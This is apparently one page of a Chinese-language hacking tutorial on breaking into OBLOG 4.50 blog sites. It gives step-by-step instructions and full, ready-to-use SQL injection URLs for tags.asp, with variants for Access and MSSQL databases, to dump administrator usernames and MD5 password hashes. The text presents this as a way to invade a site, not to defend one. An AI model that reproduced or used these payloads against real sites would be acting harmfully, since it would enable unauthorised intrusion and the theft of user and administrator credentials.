oblog漏洞 一句话让OBLOG将用户密码乖乖送上

　　不同版本，不同程序的漏洞不同，入侵方法也不同，对于OBLOG 4.50 final build0619版来说我们可以通过标签法实现入侵目的，利用SQL注入漏洞让OBLOG将全部用户的帐户名与密码显示出来。

　　第一步：通过http://ip/tags.asp命令显示出该OBLOG系统的所有标签信息。(如图3)

图3

　　第二步：我们随意选择一个标签，要求这个标签里面是有内容的，不能为空。里面内容包括名字，发布者与发布时间。当然还有一点特别重要那就是记下这个标签对应的ID信息，例如笔者选择该标签后上方地址处对应的ID地址信息为“tags.asp?tagid=42”。(如图4)

图4

　　第三步：接下来就是通过一句话对OBLOG系统进行SQL注入入侵了，我们在之前记录的TAGS标签ID信息基础上添加注入命令，例如上面看到的ID地址信息为“tags.asp?tagid=42”，那么我们输入以下内容——

　　http://IP/tags.asp?t=user&keyword=trace&tagid=42%20group%20by%20userid)%20a,oblog_user%20b%20where%20a.userid=b.userid%20and%201=2%20union%20select%20username%2bchr(124)%2bpassword,2,3%20from%20oblog_admin%20union%20select%20top%20100%20b.userName,b.user_dir,b.user_folder%20from%20(select%20userid%20from%20oblog_usertags%20where%20tagid=42%20and%201=2

　　代码中有两处是于tagid=42相对应的，这点需要特别留意。当然如果目的站点使用的是MSSQL数据库而不是本文介绍的ACCESS数据库的话，相关的SQL注入代码也要进行改变，具体内容为——http://IP/tags.asp?t=user&keyword=trace&tagid=42 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username%2bchar(124)%2bpassword,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder

　　该命令执行后OBLOG将把管理员的帐户名与密码显示出来，我们可以在显示页面中看到相关信息，在|前显示的是帐户名，后面是密码，不过密码都是通过MD5加密过的。(如图5)

图5

上一页  [1] [2] [3] 下一页